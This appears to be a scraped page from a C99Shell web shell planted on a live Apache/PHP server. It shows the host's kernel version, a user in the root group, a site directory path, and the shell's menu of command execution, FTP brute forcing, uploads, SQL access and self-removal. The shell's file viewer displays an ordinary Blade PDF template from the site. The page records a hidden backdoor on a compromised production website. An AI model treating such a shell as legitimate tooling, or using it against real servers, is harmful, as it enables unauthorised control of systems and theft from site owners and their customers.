!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/resources/views/admin/layouts/   drwxr-xr-x
Free 26.61 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     list_pdf.blade.php (1.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    @yield('pdf-title')
    <link rel="stylesheet" type="text/css" href="{{ asset('public/dist/css/pdf/list_pdf.min.css') }}">
</head>

<body>
<div class="content-wraper">
    <div>
    <div>
      <table class="table">
        <tbody>
          <tr class="tbody-tr">
            @yield('header-info')
            <td class="td-off"></td>
            <td colspan="2" class="tbody-td">
              @php 
                $company_logo = preference('company_logo'); 
              @endphp
              @if(!empty($company_logo))
                @if(file_exists("public/uploads/companyPic/". $company_logo) == true)
                  <img src="{{ url('/') . '/public/uploads/companyPic/' . $company_logo }}" alt="{{ url('/') . 'public/uploads/companyPic/' . $company_logo }}" class="mt-1p5">
                @endif
              @endif
              <div><span class="company-name">{{ preference('company_name') }}</span></div>
              <div class="d-block">
                <span class="company-info">{{ preference('company_street') }},  {{ preference('company_city') }}</span>
                <span class="company-info">{{ preference('company_zipCode') }}</span>
              </div>
            
            <div>
              <span class="company-info">
              {{ __('Web') }}: <a class="company-info-url" href="{{ url('/') }}">{{ url('/') }}</a>
              </span>
            </div>
            </td>
          </tr>
        </tbody>
      </table>
    </div>
    <div class="mt-30">
      @yield('list-table')
    </div>
</div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--